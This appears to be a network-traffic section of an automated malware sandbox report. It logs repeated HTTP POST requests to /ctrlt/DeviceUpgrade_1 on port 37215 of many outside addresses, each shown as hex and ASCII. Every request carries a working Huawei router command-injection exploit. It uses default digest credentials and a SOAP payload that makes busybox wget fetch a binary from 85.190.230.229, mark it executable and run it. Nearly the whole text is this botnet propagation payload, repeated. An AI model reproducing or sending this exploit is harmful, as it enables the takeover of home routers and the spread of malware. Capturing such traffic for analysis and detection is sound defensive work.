2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.105792046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.985723972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.617558002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:31.881078959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:54.664102077 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      141192.168.2.143581841.231.145.10537215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:09.408442974 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.993889093 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      142192.168.2.1449622156.115.198.10037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:09.410891056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.961920977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.633866072 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:11.945817947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
